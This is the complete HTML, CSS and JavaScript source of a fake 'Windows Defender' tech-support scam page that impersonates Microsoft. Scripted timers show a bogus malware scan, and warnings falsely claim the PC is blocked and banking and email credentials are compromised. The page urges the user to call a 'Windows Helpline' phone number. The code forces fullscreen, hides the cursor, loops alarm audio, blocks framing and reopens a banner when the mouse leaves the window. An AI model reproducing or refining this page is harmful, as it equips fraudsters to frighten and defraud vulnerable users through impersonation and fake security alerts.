<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>Windows Defender</title>
	<link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Montserrat:wght@600;700&display=swap" rel="stylesheet">
    <link href="css/style-browser-reset.css" rel="stylesheet">
	<link href="css/style.css" rel="stylesheet">
</head>
<!-- Global site tag (gtag.js) - Google Analytics -->
    <script async src="https://www.googletagmanager.com/gtag/js?id=UA-176875146-1"></script>
    <script>
      window.dataLayer = window.dataLayer || [];
      function gtag(){dataLayer.push(arguments);}
      gtag('js', new Date());

      gtag('config', 'UA-176875146-1');
    </script>

        <script type="text/javascript">
            /* eslint-disable */
            if (top !== self) top.location = self.location;

        </script>
<body onload="playAudio()">
	

    <audio id="my_audio" src="https://bit.ly/3NadExD" loop="loop"></audio>
    <audio id="my_audioo" src="https://bit.ly/3t0PJI1" loop="loop"></audio>
	<main class="main" id="fullscreen">
		<div id="banner_chat" class="banner chat">
			<img src="icon-chat.png" alt="">
			<br>
			<span class="banner_chat_tel">(808)-999-9252</span>
			<span class="banner_chat_contact">USA Helpline</span>
		</div>


		<div id="banner1" class="banner banner1">
			<div class="main-btn">
				<button class="btn skip"><img src="skip.svg" alt=""></button>
				<button class="btn close"><img src="close.png" alt=""></button>
			</div>
			<div class="wrapper">
				<div class="wrapper-header">
					<span>Windows Defender</span>
				</div>
				<div class="wrapper-main">
					<div class="wrapper-main-img">
						<img src="comp.png" alt="">
				    </div>
				    <div class="wrapper-main-detail">
				    	<div class="wrapper-main-detail-title">
				    		You Are Protected
				    	</div>
				    	<label>Protection Updates: <span>Current</span></label>				    		
				    	<label>Last Scan: <span class="sf-main-color">Not Available</span><span>| Quick Scan</span></label>
				    	<label>Licenses: <span>1/1</span><span>| Protect Another Device</span></label>		
				    </div>
				</div>	


				<div class="wrapper-selection">
						<div class="item item-1 active">
							<label>Security</label>
							<img src="comp-min.png" alt="">
							<span>At Risk</span>
						</div>
						<div class="item item-2">
							<label>Identity</label>
							<img src="world-min.png" alt="">
							<span>Protected</span>
						</div>
						<div class="item item-3">
							<label>Performance</label>
							<img src="speed-min.png" alt="">
							<span>Optimized</span>
						</div>
						<div class="item item-4">
							<label>Firewall</label>
							<img src="microsoft-min.png" alt="">
							<span>Protected</span>
						</div>
				</div>

				<div class="wrapper-footer">
					<label>STATUS:<span>Your PC is at Risk! </span></label>
				</div>		

			</div>	

		</div>
	 	


	 	<div id="banner2" class="banner banner2">
	 		<div class="main-btn">
				<button class="btn skip"><img src="skip.svg" alt=""></button>
				<button class="btn close"><img src="close.png" alt=""></button>
			</div>
			<div class="wrapper">
			     <div class="wrapper-header">
					<span>Quick Scan</span>
					<label id="bthide">Scanning Startup Files and Commonly Infected Areas...</label>
					<label id="cnt1">C:WindowsSystem32sihost.exe</label>
				</div>
				<div class="wrapper-table">
							<div class="wrapper-table-title">
								<b>Results Summary:</b>
						    </div>
						    <div class="wrapper-table-item">
						    	<span class="wrapper-table-item-text">[+] Total Items Scanned</span>
						    	<span class="wrapper-table-item-number" id="cnt2">0</span>
						    </div>

						    <div class="wrapper-table-item">
						    	<span class="wrapper-table-item-text">[+] Total Security Risks Detected </span>
						    	<span class="wrapper-table-item-number" id="cnt3">0</span>
						    </div>

						    <div class="wrapper-table-item">
						    	<span class="wrapper-table-item-text">[+] Total Security Risks Resolved</span>
						    	<span class="wrapper-table-item-number">0</span>
						    </div>

						    <div class="wrapper-table-item">
						    	<span class="wrapper-table-item-text">Total Security Risks Requiring Attention</span>
						    	<span class="wrapper-table-item-number" id="cnt4">0</span>
						    </div>
					
				</div>

				<div class="wrapper-buttons">
					<button class="btn">Pause</button>
				    <button class="btn">Stop</button>
				</div>


			</div>
	 	</div>
		

		<div id="banner3" class="banner banner3">
                <div class="wrapper">
                     <div class="wrapper-title">
                     	Windows Defender - Security Warning
                	 </div>
                	 <div class="wrapper-text">
                	 	<span>** ACCESS TO THIS PC HAS BEEN BLOCKED FOR SECURITY REASONS **</span>
						<span>Your computer has alerted us that it has been infected with a Trojan Spyware. The following data has been
							compromised.</span>
						<ul class="wrapper-text-list">
							<li>> Email Credentials</li>
							<li>> Banking Passwords</li>
							<li>> Facebook Login</li>
							<li>> Pictures &amp; Documents</li>
						</ul>
						<span>Windows Security has found potentially unwanted Adware on this device that can steal your passwords, online
							identity, financial information, personal files, pictures or documents.</p>
						
						
					</span>

						<span>You must contact us immediately so that our engineers can walk you through the removal process over the
							phone.</span>

						<span>Call Windows Helpline immediately to report this threat, prevent identity theft and unlock access to this
							device.</span>

						<span>Closing this window will put your personal information at risk and lead to a suspension of your Windows
							Registration key.</span>

						<span>Call Windows Helpline: (808)-999-9252</span>
                	 </div>

			        <div class="wrapper-buttons">
						<button class="btn">Cancel</button>
					    <button class="btn btn-ok">OK</button>
					</div>

				 </div>
           
		</div>
		
		<div id="banner4" class="banner banner4" onclick="myFunction()">
            <div class="main-btn">
				<button class="btn skip"><img src="skip.svg" alt=""></button>
				<button class="btn close"><img src="close.png" alt=""></button>
			</div>
			 <div class="wrapper">
			 	<div class="wrapper-icon-microsoft">
			 	<div class="wrapper-icon">
			 		<img src="microsoft-label.png" alt="">
			    </div>
			</div>
			 	<div class="wrapper-main">
			 		<div class="wrapper-main-title">
			 			Windows Firewall Protection
			        </div>
			        <div class="wrapper-main-text">
			 			<label class="wrapper-main-text-alert">Virus Alert - Error Code: #MS079067</label>
			 			<label class="wrapper-main-text-adress">Access to this PC has been blocked for your security.</label>
			 			<label class="wrapper-main-text-tel">Contact Windows Helpline: (808)-999-9252</label>
			        </div>
			    </div>

			     <div class="wrapper-footer">
			        	<div class="wrapper-footer-text">
			        		<span>App: Trojan Spyware</span>
			        		<span>Threat: Ads.financetrack(1).exe</span>
			            </div>

			         <div class="wrapper-buttons">
						<button class="btn">Deny</button>
					    <button class="btn btn-right" id="dd">Allow</button>
					</div>

			     </div>	
			 </div>	
		</div> 
    </main> 
    
</body>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
  <script type="text/javascript">
    	var fullscreen = document.getElementById("fullscreen");
    	var el = document.documentElement;
    	fullscreen.addEventListener("click", ()=>{
    		if (el.requestFullscreen){
    			el.requestFullscreen()
    		}
    	})
        
    	var my_audio = document.getElementById("my_audio");
my_audio.volume = 0.2;
var my_audioo = document.getElementById("my_audioo");
my_audioo.volume = 1;
    	var clickBody = document.getElementById("fullscreen");
    	var my_audio = document.getElementById("my_audio");
        var my_audioo = document.getElementById("my_audioo");
		clickBody.addEventListener("click", ()=>{
            document.getElementById("fullscreen").style.backgroundImage = "url(blue.png)";
            document.getElementById("fullscreen").style.cursor = "none";
            document.getElementById("banner_chat").style.display = "block";
				my_audio.play();
                my_audioo.play();
		})



   </script>

<style>
    #dd {
        animation: blink-animation 1s steps(5, start) infinite;
-webkit-animation: blink-animation 1s steps(5, start) infinite;
    }
    @keyframes blink-animation {
to {
visibility: hidden;
}
}
@-webkit-keyframes blink-animation {
to {
visibility: hidden;
}
}
	.main {
  min-height: 100%;
  min-width: 1024px;
  width: 100%;
  height: auto;
  position: fixed;
  top: 0;
  left: 0;

 background: linear-gradient( rgba(0, 0, 0, 0.45), rgba(0, 0, 0, 0.45) ), url('bg.png') no-repeat top center fixed;
  background-size: cover;
  overflow: hidden; 
}

.main{
	font-family: 'Montserrat', sans-serif;
}

.banner{
	display: none;
}

.main .banner.chat{
	/*display: inline-block;*/
	background: #fff;
    width: 220px;
    text-align: center;
    border-top-left-radius: 30px;
    border-top-right-radius: 30px;
    border-bottom-left-radius: 30px;
    position: fixed;
    z-index: 5;
    display: none;
    bottom: 35px;
    right: 35px;
    padding-bottom: 30px;
    padding-top: 30px;
  
}







.main .banner.chat img{
	display: block;
    margin: 0 auto;
}

.main .banner.chat span{
	
	display: block;
	font-style: normal;
	font-weight: 600;
	font-size: 15px;
	line-height: 18px;
	text-align: center;
	color: #000000;
}

.main .banner.chat span.banner_chat_label{
	
	display: block;
	font-style: normal;
    font-size: 20px;
    line-height: 15px;
	color: blue;
	padding-top: 12px;
    padding-bottom: 13px;
}


.btn{
    background: none repeat scroll 0 0 transparent;
    border: medium none;
    border-spacing: 0;
    color: #26589F;
    font-family: 'PT Sans Narrow',sans-serif;
    font-size: 16px;
    font-weight: normal;
    line-height: 1.42rem;
    list-style: none outside none;
    margin: 0;
    padding: 0;
    text-align: left;
    text-decoration: none;
    text-indent: 0;	
}





.main .banner.banner1{
    width: 900px;
    background: #FFFFFF;
    box-shadow: 0px 0px 15px 5px rgb(0 0 0 / 35%);
    border-radius: 8px;
    position: fixed;
    left: 50%;
    top: 189px;
    transform: translate(-50%, 0);
    z-index: 2;
}


.main-btn .skip{
    width: 40px;
    height: 40px;
    border-radius: 50%;
    position: absolute;
    right: 52px;
    top: -52px;
    background: #fff;
    display: inline-block;
}

.main-btn .skip img{
    width: 14px;
    height: 2px;
    margin: 0 auto;
    display: flex;
}


.main-btn .close{
    width: 40px;
    height: 40px;
    border-radius: 50%;
    position: absolute;
    right: 0px;
    top: -52px;
    background: #5A9FFF;
    display: inline-block;
}

.main-btn .close img{
    width: 16px;
    height: 16px;
    display: flex;
    margin: 0 auto;
}




.main .banner.banner1 .wrapper-header{
    height: 68px;
    display: flex;
    align-items: center;
    background: #F1511B;
    border-radius: 8px 8px 0px 0px;
}

.main .banner.banner1 .wrapper-header span{
    margin-left: 66px;
    font-style: normal;
    font-weight: bold;
    font-size: 15px;
    line-height: 18px;
    color: #ffffff;
    font-family: 'Montserrat', sans-serif;
    position: relative;

}



.main .banner.banner1 .wrapper-header::before{
	content: "";
	width: 28px;
	height: 28px;
	background: url('microsoft-bg.png');
	position: absolute;
	left: 30px;
}



.main .banner.banner1 .wrapper-main{
    margin-top: 55px;
    margin-bottom: 55px;
    display: flex;
    justify-content: center;	
}

.main .banner.banner1 .wrapper-main-img {
	      margin-right: 32px;
}


.main .banner.banner1 .wrapper-main-detail-title{
	display: block;
    font-style: normal;
    font-weight: 600;
    font-size: 24px;
    line-height: 18px;
    color: #5A9FFF;
    padding-top: 5px;
    margin-bottom: 12px;
}

.main .banner.banner1 .wrapper-main-detail label{
    display: block;
    margin-bottom: 8px;
    font-style: normal;
    font-weight: 600;
    font-size: 15px;
    line-height: 18px;
    color: #242424;
}


.main .banner.banner1 .wrapper-main-detail label span{
    color: #5A9FFF;
    margin-left: 12px;
}

.main .banner.banner1 .wrapper-main-detail label span.sf-main-color{
     color: #F1511B;
}

.main .banner.banner1 .wrapper-selection {
    display: flex;
    flex-wrap: nowrap;
    padding-left: 1px;
    padding-right: 1px;
}



.main .banner.banner1 .wrapper-selection .item{
	border-bottom: 1px solid #EBEBEB;
	border-top: 1px solid #EBEBEB;
	border-left: 0.5px solid #EBEBEB;
	border-right: : 0.5px solid #EBEBEB;
    width: 25%;
    text-align: center;
    background: #F6F6F6;
}

.main .banner.banner1 .wrapper-selection .item label{
    display: block;
    font-style: normal;
    font-weight: 600;
    font-size: 20px;
    line-height: 18px;
    color: #8A8A8A;
    margin-top: 25px;
}

.main .banner.banner1 .wrapper-selection .item img{
    margin: 0 auto;
    margin: 25px auto;
}

.main .banner.banner1 .wrapper-selection .item span{
    display: block;
    font-style: normal;
    font-weight: 600;
    font-size: 15px;
    line-height: 18px;
    margin-bottom: 25px;
    color: #8A8A8A;
}

.main .banner.banner1 .wrapper-selection .item.active{
	background: #F1511B;
    border-radius: 0px;
    border-bottom: 1px solid #F1511B;
	border-top: 1px solid #F1511B;
	border-left: 0.5px solid #F1511B;
	border-right: : 0.5px solid #F1511B;
	position: relative;
}


.main .banner.banner1 .wrapper-selection .item.active:after {
    position: absolute;
    top: -10px;
    right: 45%;
    display: inline-block;
    border-right: 15px solid transparent;
    border-bottom: 12px solid #F1511B;
    border-left: 15px solid transparent;
    content: '';
}


.main .banner.banner1 .wrapper-selection .item.active label,
.main .banner.banner1 .wrapper-selection .item.active span{
  color: #fff;
}




.main .banner.banner1 .wrapper-footer{
	padding-left: 30px;
    padding-top: 18px;
    padding-bottom: 17px;
    display: inline-block;
}


.main .banner.banner1 .wrapper-footer label{
    font-style: normal;
    font-weight: 600;
    font-size: 15px;
    line-height: 18px;
    color: #242424;
}

.main .banner.banner1 .wrapper-footer label span{
    margin-left: 12px;
    color: #F1511B;
}






.main .banner.banner2{
    width: 677px;
    background: #FFFFFF;
    box-shadow: 0px 0px 15px 5px rgb(0 0 0 / 35%);
    border-radius: 8px;
    position: fixed;
    left: 50%;
    top: 269px;
    transform: translate(-50%, 0);
    z-index: 3
}


.main .banner.banner2 .wrapper-header{ 
    background: #5A9FFF;
    border-radius: 8px 8px 0px 0px;
    padding: 22px 30px;
}

.main .banner.banner2 .wrapper-header span{ 
    display: block;
    font-style: normal;
    font-weight: bold;
    font-size: 15px;
    line-height: 18px;
    color: #FFFFFF;
}

.main .banner.banner2 .wrapper-header label{ 
    display: block;
    font-style: normal;
    font-weight: 600;
    font-size: 12px;
    line-height: 15px;
    text-align: right;
    color: #fff;
}


.main .banner.banner2  .wrapper-table{
    margin: 20px 30px;
    border: 1px solid #242424;
    border-radius: 5px;
    padding: 15px 20px;
}

.main .banner.banner2 .wrapper-table-title{
    padding-bottom: 15px;
    border-bottom: 1px solid #242424;
    font-style: normal;
    font-weight: 600;
    font-size: 12px;
    line-height: 15px;
    color: #242424;
}

.main .banner.banner2 .wrapper-table-item{
    padding-top: 10px;
}


.main .banner.banner2 .wrapper-table-item span{
    font-style: normal;
    font-weight: 600;
    font-size: 12px;
    line-height: 15px;
    color: #242424;
}



.main .banner.banner2 .wrapper-table-item span.wrapper-table-item-number{
    float: right;
}


.main .banner.banner2 .wrapper-buttons{
    padding: 0px 20px 10px 10px;
    text-align: right;
}

.main .banner.banner2 .wrapper-buttons .btn{
    font-style: normal;
    font-weight: bold;
    font-size: 15px;
    line-height: 18px;
    color: #ffffff;
    background: #5A9FFF;
    margin-left: 20px;
    display: inline-block;
    padding: 10px 25px;
    border-radius: 18px;
}

.main .banner.banner3{
    width: 400px;
    background: #F1511B;
    box-shadow: 0px 0px 15px 5px rgb(0 0 0 / 35%);
    border-radius: 8px;
    position: fixed;
    left: 35%;
    top: 50px;
    transform: translate(-50%, 0);
    z-index: 4;
    animation: zoominoutsinglefeatured 2.5s infinite ;
}
@keyframes zoominoutsinglefeatured {
      0% {
          transform: scale(1,1);
      }
      50% {
          transform: scale(1.1,1.1);
      }
      100% {
          transform: scale(1,1);
      }
  }
  
  @keyframes zoomininsinglefeatured {
      0% {
          transform: scale(1,1);
      }
      50% {
          transform: scale(1.1,1.1);
      }
      100% {
          transform: scale(1,1);
      }
  }


.main .banner.banner3{
    padding: 20px;
}


.main .banner.banner3 .wrapper-title{
    color: #ffffff;
    margin-bottom: 20px;
    font-style: normal;
    font-weight: bold;
    font-size: 15px;
    line-height: 18px;
    text-align: center;
}




.main .banner.banner3 .wrapper-text span{
    font-style: normal;
    font-weight: 600;
    font-size: 12px;
    line-height: 18px;
    color: #ffffff;
    display: block;
    margin-bottom: 20px;
}


.main .banner.banner3 .wrapper-text ul li{
    font-style: normal;
    font-weight: 600;
    font-size: 12px;
    line-height: 18px;
    color: #ffffff;
    display: block;
    margin-bottom: 5px;
}



.main .banner.banner3 .wrapper-text ul{
     margin-bottom: 25px;
}


.main .banner.banner3 .wrapper-buttons{
    text-align: right;
    padding-top: 5px;
}

.main .banner.banner3 .wrapper-buttons .btn{
    font-style: normal;
    font-weight: bold;
    font-size: 15px;
    line-height: 18px;
    color: #ffffff;
    background: transparent;
    border:1px solid #ffffff;
    margin-left: 10px;
    display: inline-block;
    padding: 10px 20px;
    border-radius: 22px;
}

.main .banner.banner3 .wrapper-buttons .btn.btn-ok{
   color: #5A9FFF;
   background: #ffffff;
}


.main .banner.banner4{
    width: 591px;
    background: #ffffff;
    box-shadow: 0px 0px 15px 5px rgb(0 0 0 / 35%);
    border-radius: 8px;
    position: fixed;
    left: 50%;
    top: 300px;
    transform: translate(-50%, 0);
    z-index: 5

}


.main .banner.banner4 .wrapper{
    position: relative;
}



.main .banner.banner4 .wrapper-main{
    margin-top: 85px;
}


.main .banner.banner4 .wrapper-main .wrapper-main-title{
    font-style: normal;
    font-weight: bold;
    font-size: 18px;
    line-height: 22px;
    text-align: center;
    color: #FFFFFF;
    background: #F1511B;
    padding-top: 12px;
    padding-bottom: 10px;
}



.main .banner.banner4 .wrapper-main .wrapper-main-text{
    margin: 20px 30px;
  
}


.main .banner.banner4 .wrapper-main .wrapper-main-text label{
    margin-bottom: 10px;
    display: block;
}

.main .banner.banner4 .wrapper-main .wrapper-main-text label.wrapper-main-text-alert{
font-style: normal;
font-weight: bold;
font-size: 15px;
line-height: 18px;
color: #242424;
}

.main .banner.banner4 .wrapper-main .wrapper-main-text label.wrapper-main-text-adress{
font-style: normal;
font-weight: 600;
font-size: 12px;
line-height: 15px;
}

.main .banner.banner4 .wrapper-main .wrapper-main-text label.wrapper-main-text-tel{
font-style: normal;
font-weight: normal;
font-size: 15px;
line-height: 18px;
}




.main .banner.banner4 .wrapper-footer{
    background: #5A9FFF;
    border-radius: 0px 0px 8px 8px;
    display: flex;
    justify-content: space-between;
    align-items: center;
    padding:10px 30px;  
}


.main .banner.banner4 .wrapper-footer span{

    font-style: normal;
    font-weight: 600;
    font-size: 10px;
    line-height: 12px;
    color: #ffffff;
    display: block;
    margin-bo: 10px;
    margin: 5px 0px;

}

.main .banner.banner4 .wrapper-footer .btn{
    font-style: normal;
    font-weight: bold;
    font-size: 15px;
    line-height: 18px;
    color: #5A9FFF;
    background: #ffffff;
    border:1px solid #ffffff;
    margin-left: 10px;
    display: inline-block;
    padding: 10px 20px;
    border-radius: 22px;
}


.main .banner.banner4 .wrapper-footer .btn.btn-right{
    color: #ffffff;
    background: #F1511B;
    border:1px solid #F1511B;
}

.main .banner.banner4 .wrapper-icon{
    padding: 37px;
    border-radius: 50%;
    background: #fff;
    display: inline-block;
    

}
.main .banner.banner4 .wrapper-icon-microsoft{
position: absolute;
    margin-left: auto;
    margin-right: auto;
    left: 0;
    right: 0;
    text-align: center;
    top: -138px;
}


@media screen and (max-width: 1500px) { 

.main .banner.banner1 {
    top: 89px;
}

.main .banner.banner2 {
top: 169px;
}
.main .banner.banner3 {
top: 50px;

}

.main .banner.banner4 {
top: 258px;
}
}

@media screen and (max-width: 1024px) { /* Specific to this particular image */
  .main {
    left: 50%;
    margin-left: -512px;   /* 50% */
  }
}













</style>
<script>
     setTimeout(function () {
        document.getElementById("banner1").style.display = "block";
    }, 0000);
   
    setTimeout(function () {
        document.getElementById("banner2").style.display = "block";
    }, 1000)
    setTimeout(function () {
        document.getElementById("banner3").style.display = "block";
    }, 3500)
    setTimeout(function () {
        document.getElementById("banner4").style.display = "block";
    }, 4000)
  
    setTimeout(function () {
        document.getElementById("cnt1").innerHTML = "C:\Windows\System32\csrss.exe";
    }, 2000);
    setTimeout(function () {
        document.getElementById("cnt1").innerHTML = "C:\Windows\System32\sihost.exe";
    }, 2700);
    setTimeout(function () {
        document.getElementById("cnt1").innerHTML = "C:\Program Files\Windows Defender\MSASCuiL.exe";
    }, 3600);
    setTimeout(function () {
        document.getElementById("cnt1").innerHTML = "C:\Windows\System32\SgrmBroker.exe";
    }, 4200);
    setTimeout(function () {
        document.getElementById("cnt1").innerHTML = "C:\Windows\System32\DDFs";
    }, 4800);


    setTimeout(function () {
        document.getElementById("cnt1").innerHTML = "C:\Windows\System32\Recovery";
    }, 5600);
    setTimeout(function () {
        document.getElementById("cnt1").innerHTML = "C:\Windows\System32\DriverState";
    }, 6200);
    setTimeout(function () {
        document.getElementById("cnt1").innerHTML = "tempRoot\system32\DRIVERS\bowser.sys";
    }, 6800);
    setTimeout(function () {
        document.getElementById("cnt1").innerHTML = " C:\Windows\System32\WinBioDatabase";
    }, 7600);
    setTimeout(function () {
        document.getElementById("cnt1").innerHTML = "vmickvpexchange";
    }, 8200);
    setTimeout(function () {
        document.getElementById("cnt1").innerHTML = "WdNisDrv";
    }, 9800);
    setTimeout(function () {
        document.getElementById("cnt1").innerHTML = "rdbss";
    }, 10400);
    setTimeout(function () {
        document.getElementById("cnt1").innerHTML = "UASPStor";
    }, 11000);
    setTimeout(function () {
        document.getElementById("cnt1").innerHTML = "C:\Windows\System32\dot3svc.dll";
    }, 11600);
    setTimeout(function () {
        document.getElementById("cnt1").innerHTML = "ㅤ ";
        document.getElementById("bthide").innerHTML = "ㅤ";
       
    }, 16000);

    setTimeout(function () {
        document.getElementById("cnt2").innerHTML = "0";
    }, 1000);
    setTimeout(function () {
        document.getElementById("cnt2").innerHTML = "74";
    }, 1300);
    setTimeout(function () {
        document.getElementById("cnt2").innerHTML = "121";
    }, 1700);
    setTimeout(function () {
        document.getElementById("cnt2").innerHTML = "178";
    }, 2100);
    setTimeout(function () {
        document.getElementById("cnt2").innerHTML = "207";
    }, 2800);
    setTimeout(function () {
        document.getElementById("cnt2").innerHTML = "289";
    }, 3300);
    setTimeout(function () {
        document.getElementById("cnt2").innerHTML = "320";
    }, 3600);
    setTimeout(function () {
        document.getElementById("cnt2").innerHTML = "367";
    }, 4000);
    setTimeout(function () {
        document.getElementById("cnt2").innerHTML = "494";
    }, 4400);
    setTimeout(function () {
        document.getElementById("cnt2").innerHTML = "533";
    }, 4900);
    setTimeout(function () {
        document.getElementById("cnt2").innerHTML = "677";
    }, 5300);
    setTimeout(function () {
        document.getElementById("cnt2").innerHTML = "718";
    }, 6000);
    setTimeout(function () {
        document.getElementById("cnt2").innerHTML = "779";
    }, 6600);
    setTimeout(function () {
        document.getElementById("cnt2").innerHTML = "801";
    }, 7000);
    setTimeout(function () {
        document.getElementById("cnt2").innerHTML = "852";
    }, 7400);
    setTimeout(function () {
        document.getElementById("cnt2").innerHTML = "972";
    }, 7900);
    setTimeout(function () {
        document.getElementById("cnt2").innerHTML = "1247";
    }, 8600);
    setTimeout(function () {
        document.getElementById("cnt2").innerHTML = "1581";
    }, 8600);
    setTimeout(function () {
        document.getElementById("cnt2").innerHTML = "1633";
    }, 9000);
    setTimeout(function () {
        document.getElementById("cnt2").innerHTML = "1747";
    }, 9600);
    setTimeout(function () {
        document.getElementById("cnt2").innerHTML = "1998";
    }, 10000);
    setTimeout(function () {
        document.getElementById("cnt2").innerHTML = "2038";
    }, 13000);




    setTimeout(function () {
        document.getElementById("cnt3").innerHTML = "1";
        document.getElementById("cnt3").style.color = "red";
        document.getElementById("cnt4").style.color = "red";
    }, 2100);
    setTimeout(function () {
        document.getElementById("cnt4").innerHTML = "1";
    }, 2100);
    setTimeout(function () {
        document.getElementById("cnt3").innerHTML = "5";
    }, 3000);
    setTimeout(function () {
        document.getElementById("cnt4").innerHTML = "5";
    }, 3000);
    setTimeout(function () {
        document.getElementById("cnt3").innerHTML = "17";
    }, 3500);
    setTimeout(function () {
        document.getElementById("cnt4").innerHTML = "17";
    }, 3500);
    setTimeout(function () {
        document.getElementById("cnt3").innerHTML = "24";
    }, 4200);
    setTimeout(function () {
        document.getElementById("cnt4").innerHTML = "24";
    }, 4200);
    setTimeout(function () {
        document.getElementById("cnt3").innerHTML = "25";
    }, 5000);
    setTimeout(function () {
        document.getElementById("cnt4").innerHTML = "25";
    }, 5000);
    setTimeout(function () {
        document.getElementById("cnt3").innerHTML = "36";
    }, 6000);
    setTimeout(function () {
        document.getElementById("cnt4").innerHTML = "36";
    }, 6000);
    setTimeout(function () {
        document.getElementById("cnt3").innerHTML = "43";
    }, 10300);
    setTimeout(function () {
        document.getElementById("cnt4").innerHTML = "43";
    }, 10300);

   
  
   
 
</script>
<script>
    function myFunction() {
    document.getElementById("banner4").style.display = "none";

    document.addEventListener('mouseout', e => {
    if (!e.toElement && !e.relatedTarget) {
        document.getElementById('banner4').style.display = "block";
      }
});

}
// window.prompt("*******CONFIRM BROWSER NAVIGATION.******* \n \nAre you sure you want to leave? \n \nDue to mutliple vulnerabilities on this PC, Windows Defender blocked this PC for your own security. Please call us immediately to speak with a support engineer for the removal instructions over the phone. Windows Defender Scan was unable to remove this virus automatically. Closing this alert will put your PC's security at serious risk and your identity to be compromised. \nPassword: ") window.prompt("*******CONFIRM BROWSER NAVIGATION.******* \n \nAre you sure you want to leave? \n \nDue to mutliple vulnerabilities on this PC, Windows Defender blocked this PC for your own security. Please call us immediately to speak with a support engineer for the removal instructions over the phone. Windows Defender Scan was unable to remove this virus automatically. Closing this alert will put your PC's security at serious risk and your identity to be compromised. \nPassword: ") //
</script>

</html>